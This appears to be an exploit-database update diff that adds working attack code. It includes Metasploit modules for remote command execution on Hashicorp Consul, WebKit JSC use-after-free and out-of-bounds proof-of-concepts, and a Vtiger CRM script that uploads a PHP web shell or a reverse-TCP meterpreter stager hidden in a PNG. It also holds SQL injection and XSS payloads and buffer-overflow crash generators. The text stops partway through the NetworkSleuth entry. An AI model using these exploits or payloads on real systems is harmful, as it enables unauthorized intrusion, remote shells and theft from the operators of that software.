DB: 2019-01-03

12 changes to exploits/shellcodes

EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
WebKit JSC - 'AbstractValue::set' Use-After-Free
WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write

Ayukov NFTP FTP Client 2.0 - Buffer Overflow
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)
Hashicorp Consul - Remote Command Execution via Services API (Metasploit)
WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
Frog CMS 0.9.5 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting

FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection

Craft CMS 3.0.25 - Cross-Site Scripting
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Vtiger CRM 7.1.0 - Remote Code Execution

exploits/linux/remote/46073.rb

@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hashicorp Consul Remote Command Execution via Rexec",
+      'Description'    => %q{
+        This module exploits a feature of Hashicorp Consul named rexec.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
+          'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
+          [ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
+          [ 'URL', 'https://github.com/torque59/Garfield' ]
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => {},
+      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 11 2018'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+        Opt::RPORT(8500)
+      ])
+  end
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri' => normalize_uri(uri, "/v1/agent/self"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+    begin
+      agent_info = JSON.parse(res.body)
+      if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    rescue JSON::ParserError
+      vprint_error 'Failed to parse JSON output.'
+      return CheckCode::Unknown
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    uri = target_uri.path
+
+    print_status('Creating session.')
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, 'v1/session/create'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
+    })
+
+    if res and res.code == 200
+      begin
+        sess = JSON.parse(res.body)
+        print_status("Got rexec session ID #{sess['ID']}")
+      rescue JSON::ParseError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+
+    print_status("Setting command for rexec session #{sess['ID']}")
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
+    })
+    if res and not res.code == 200 or res.body == 'false'
+      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+    end
+
+    print_status("Triggering execution on rexec session #{sess['ID']}")
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
+    })
+    if res and not res.code == 200
+      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+    end
+
+    begin
+      Timeout.timeout(datastore['TIMEOUT']) do
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
+          'headers' => {
+            'X-Consul-Token' => datastore['ACL_TOKEN']
+          }
+        })
+        begin
+          data = JSON.parse(res.body)
+          break if data.include? 'out'
+        rescue JSON::ParseError
+          fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+        end
+        sleep 2
+      end
+    rescue Timeout::Error
+      # we catch this error so cleanup still happen afterwards
+      print_status("Timeout hit, error with payload ?")
+    end
+
+    print_status("Cleaning up rexec session #{sess['ID']}")
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    if res and not res.code == 200 or res.body == 'false'
+      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+    end
+
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    if res and not res.code == 200 or res.body == 'false'
+      fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
+    end
+  end
+
+  def exploit
+    execute_cmdstager()
+  end
+end

exploits/linux/remote/46074.rb

@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hashicorp Consul Remote Command Execution via Services API",
+      'Description'    => %q{
+        This module exploits Hashicorp Consul's services API to gain remote command
+        execution on Consul nodes.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
+          'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
+          [ 'URL', 'https://github.com/torque59/Garfield' ]
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => {},
+      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 11 2018'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+        Opt::RPORT(8500)
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, '/v1/agent/self'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200
+      vprint_error 'Unexpected reply'
+      return CheckCode::Safe
+    end
+
+    agent_info = JSON.parse(res.body)
+
+    if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  rescue JSON::ParserError
+    vprint_error 'Failed to parse JSON output.'
+    return CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts = {})
+    uri = target_uri.path
+    service_name = Rex::Text.rand_text_alpha(5..10)
+    print_status("Creating service '#{service_name}'")
+
+    # NOTE: Timeout defines how much time the check script will run until
+    # getting killed. Arbitrarily set to one day for now.
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        :ID => "#{service_name}",
+        :Name => "#{service_name}",
+        :Address => "127.0.0.1",
+        :Port => 80,
+        :check => {
+          :script => "#{cmd}",
+          :Args => ["sh", "-c", "#{cmd}"],
+          :interval => "10s",
+          :Timeout => "86400s"
+        }
+      }.to_json
+    })
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.')
+    end
+    print_status("Service '#{service_name}' successfully created.")
+    print_status("Waiting for service '#{service_name}' script to trigger")
+    sleep(12)
+    print_status("Removing service '#{service_name}'")
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(
+        uri,
+        "v1/agent/service/deregister/#{service_name}"
+      ),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply,
+        'An error occured when contacting the Consul API.'
+      )
+    end
+  end
+
+  def exploit
+    execute_cmdstager()
+  end
+end

exploits/multiple/dos/46071.html

@@ -0,0 +1,106 @@
+<!--
+void AbstractValue::set(Graph& graph, RegisteredStructure structure)
+{
+    RELEASE_ASSERT(structure);
+    
+    m_structure = structure;
+
+    m_arrayModes = asArrayModes(structure->indexingType());
+    m_type = speculationFromStructure(structure.get());
+    m_value = JSValue();
+    
+    checkConsistency();
+    assertIsRegistered(graph);
+}
+
+It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as 
+writing into an immutable butterfly can be used to bypass write barriers.
+
+I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.
+
+PoC:
+-->
+
+// ./jsc --useConcurrentJIT=false ~/test.js
+
+function set(arr, value) {
+    arr[0] = value;
+}
+
+function getImmutableArrayOrSet(get, value) {
+    let arr = [1];
+    if (get)
+        return arr;
+
+    set(arr, value);  // This inlinee is for having checkArray not take the paths using the structure comparison.
+    set({}, 1);
+}
+
+function main() {
+    getImmutableArrayOrSet(true);
+
+    for (let i = 0; i < 100; i++) {
+        getImmutableArrayOrSet(false, {});
+    }
+
+    let arr = getImmutableArrayOrSet(true);
+    print(arr[0] === 1);
+}
+
+main();
+
+PoC 2 (UaF):
+<script>
+
+function sleep(ms) {
+    let s = new Date();
+    while (new Date() - s < ms) {
+
+    }
+}
+
+function mark() {
+    for (let i = 0; i < 40; i++) {
+        new ArrayBuffer(1024 * 1024 * 1);
+    }
+}
+
+function set(arr, value) {
+    arr[0] = value;
+}
+
+function getImmutableArrayOrSet(get, value) {
+    let arr = [1];
+    if (get)
+        return arr;
+
+    set(arr, value);
+    set({}, 1);
+}
+
+function main() {
+    getImmutableArrayOrSet(true);
+
+    for (let i = 0; i < 10000; i++)
+        getImmutableArrayOrSet(false, {});
+
+    sleep(500);
+
+    let arr = getImmutableArrayOrSet(true);
+
+    mark();
+    getImmutableArrayOrSet(false, []);
+    mark();
+
+    setTimeout(() => {
+        try {
+            alert(arr[0]);
+        } catch (e) {
+            alert(e);
+        }
+    }, 200);
+}
+
+main();
+
+</script>

exploits/multiple/dos/46072.js

@@ -0,0 +1,41 @@
+/*
+bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
+{
+    unsigned oldLength = storage->length();
+    RELEASE_ASSERT(count <= oldLength);
+    
+    // If the array contains holes or is otherwise in an abnormal state,
+    // use the generic algorithm in ArrayPrototype.
+    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) 
+        || hasSparseMap() 
+        || shouldUseSlowPut(indexingType())) {
+        return false;
+    }
+
+    if (!oldLength)
+        return true;
+    
+    unsigned length = oldLength - count;
+    
+    storage->m_numValuesInVector -= count;
+    storage->setLength(length);
+
+
+Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user.
+
+In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.
+
+PoC:
+*/
+
+function main() {
+    let arr = [1];
+
+    arr.length = 0x100000;
+    arr.splice(0, 0x11);
+
+    arr.length = 0xfffffff0;
+    arr.splice(0xfffffff0, 0, 1);
+}
+
+main();

exploits/php/webapps/46027.html

@@ -1,4 +1,4 @@
-# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF
+# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
 # Date: 12/20/2018
 # Exploit Author: mqt
 # Vendor Homepage: http://http://www.zeuscart.com/

exploits/php/webapps/46065.py

@@ -0,0 +1,149 @@
+# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution
+# Date: 2018-12-27
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.vtiger.com
+# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download
+# Version: v7.1.0
+# Category: Webapps
+# Tested on: XAMPP for Linux 5.6.38-0
+# Software Description : Vtiger CRM enables sales, support, and marketing teams to
+# organize and collaborate to measurably improve customer experiences and business outcomes.
+
+# Description : This application has the vulnerability of uploading files with the extension "php3" in the logo upload field.
+# But the uploaded file must be in PNG format and size 150X40.
+# We can put PHP code into image source. After you make the extension "php3", the PHP code that we've placed can work.
+# Therefore, PHP code can be executed using "<? ?>" Tags in PNG format file.
+# ==================================================================
+# I have exploited in 2 different ways.
+# First one uploads a basic php shell for you and lets you control it through the console.
+# Second one uploads the php meterpreter payload to the target site and lets you set this payload.
+
+# PoC:
+
+#!/usr/bin/python
+ 
+import mechanize, sys, cookielib, requests
+import colorama, urllib, re, random
+from colorama import Fore
+
+def bannerche():
+    print '''
+ @-------------------------------------------------------------@
+ |       Vtiger CRM 7.1.0 - Remote Code Execution Exploit      |
+ |              Vulnerability discovered by AkkuS              |
+ |               My Blog - https://pentest.com.tr              |
+ @-------------------------------------------------------------@
+          '''
+bannerche()
+ 
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST>"
+    exit(0)
+ 
+rhost = sys.argv[1]
+UserName = str(raw_input("User Name: ")) # Administrator Username Input
+Password = str(raw_input("Password: "))  # Administrator Password Input
+ 
+print(Fore.BLUE + "+ [*] Loging in...")
+br = mechanize.Browser()                 # set cookies
+br.set_handle_robots(False)
+cj = cookielib.LWPCookieJar()
+br.set_cookiejar(cj)
+ 
+br.open("http://"+rhost+"/")             # User Access Login
+assert br.viewing_html()
+br.select_form(nr=0)
+br.form['username'] = UserName
+br.form['password'] = Password
+br.submit()
+ 
+title = br.title()
+if title == "Dashboard":                 # Access control
+   print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
+   print (Fore.GREEN + "+ [*] Login successful")
+else:
+   print (Fore.RED + "+ [*] User information is incorrect.")
+   sys.exit()
+##
+# Introducing Cookie and CSRF token information
+##
+check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj)
+
+doc = check.text
+
+finder = re.findall(r'csrfMagicToken = ".*";', doc)
+csrf = finder[0].replace('csrfMagicToken = ', '').replace('"','').replace(';var csrfMagicName = __vtrftk;','').strip()
+csrf_to_data = str(csrf)
+print(Fore.YELLOW + "+ [*] Token = " + csrf_to_data)
+
+x = br._ua_handlers['_cookies'].cookiejar
+c = str(x)
+
+sonuc = re.findall(r"([a-fA-F\d]{32})", c)
+g = sonuc[0]
+v = str(g)
+print (Fore.YELLOW + "+ [*] PHPSESSID = " + v)
+##
+# Random value fetching
+##
+
+boundary = ''.join(str(random.randint(0,9)) for _ in xrange(29))
+filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"
+
+##
+# EXPLOIT
+##
+post_cookie = {"PHPSESSID": v}
+post_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+                 "Accept-Language": "en-US,en;q=0.5",
+                 "Connection": "close",
+                 "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+""}
+Basic_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"
+
+print (Fore.BLUE + "+ [*] Select shell type:")
+print (Fore.YELLOW +"- [*] 1 - Basic Shell")
+print ("- [*] 2 - Meterpreter Shell")
+choose = int(raw_input("- [*] Enter a number (1 or 2) : "))
+
+if choose == 1:
+    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data)
+    if Basic.status_code == 200:
+       print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
+       print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]")
+    while True:
+          shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"")
+          if shellctrl.status_code == 200:
+             Command = str(raw_input(Fore.WHITE + "shell> "))
+             URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"")
+             print URL.text
+          else:
+             print (Fore.RED + "+ [X] Unable to upload or access the shell")
+             sys.exit()  
+
+elif choose == 2:
+    print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.")
+    print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload")
+    print(Fore.YELLOW + "+ [*] Enter metasploit handler settings.")
+
+    lhost = str(raw_input(Fore.WHITE + "LHOST : "))
+    lport = str(raw_input(Fore.WHITE + "LPORT : "))
+   
+    Meter_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\<?=error_reporting(0); $ip = '"+lhost+"'; $port = "+lport+"; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n"
+   
+    Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Meter_data)
+    while True:
+          payload = requests.get("http://"+rhost+"/test/logo/"+filename+"")
+          print("+ [*] Check your Metasploit Framework console")
+          if payload.status_code == 200:    
+             print (Fore.GREEN + "+ [*] Payload uploaded and executed!")
+           
+          else:
+             print (Fore.RED + "+ [X] Unable to upload and run the payload")
+          sys.exit()
+else:
+    print("Invalid input!")
+# end
+
+
+vtiger0.png

exploits/php/webapps/46066.txt

@@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
+# Date: 2018-12-28
+# Software Link: https://wordpress.org/plugins/adicons/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 1.2
+# Category: webapps
+
+# SQL Injection
+# File: addIcon.php
+# Vulnerable code:
+# $placement=$_POST['selectedPlace'];
+
+# $x=explode("_",$placement);
+# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);
+
+# Example payload:
+selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -

exploits/php/webapps/46067.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting
+# Date: 2018-12-25
+# Exploit Author:WangDudu
+# Vendor Homepage: https://github.com/philippe/FrogCMS
+# Software Link: https://github.com/philippe/FrogCMS
+# Version:0.9.5
+# CVE :CVE-2018-20448
+
+# The parameter under /install/index.php is that the Database name has reflective XSS
+# 1 The Database name , username and password must be correct
+# 2 You can use the exp: 
+
+<script>alert(1)</script>

exploits/windows_x86-64/dos/46064.py

@@ -0,0 +1,25 @@
+# Exploit Title: NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
+# Author: Luis Martinez
+# Date: 2018-12-27
+# Vendor Homepage: www.nsauditor.com
+# Software Link : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Tested Version: 1.6.5.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python NBMonitor_1.6.5.0.py
+# 2.- Open NBMonitor_1.6.5.0.txt and copy content to clipboard
+# 3.- Open NBMonitor
+# 4.- Register -> Enter Registration Code
+# 5.- Paste ClipBoard on "Name:"
+# 6.- Key: -> 1
+# 7.- OK
+# 8.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 276
+f = open ("NBMonitor_1.6.5.0.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows_x86-64/dos/46068.py

@@ -0,0 +1,28 @@
+# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
+# Date: 2018-12-30
+# Exploit Author: Achilles
+# Vendor Homepage: https://www.poikosoft.com/
+# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
+# Exploit Author: Achilles
+# Tested Version: 8.0.7 (64-bit)
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+# Steps to Produce the Crash:=20
+# 1.- Run python code : EZ_CD_Audio_Converter.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
+# 4.- Paste the content of EVIL.txt into the field: 'Key'
+# 5.- And you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 10000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows_x86-64/dos/46069.py

@@ -0,0 +1,25 @@
+# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-12-27
+# Vendor Homepage: www.nsauditor.com
+# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested Version: 3.0.0.0
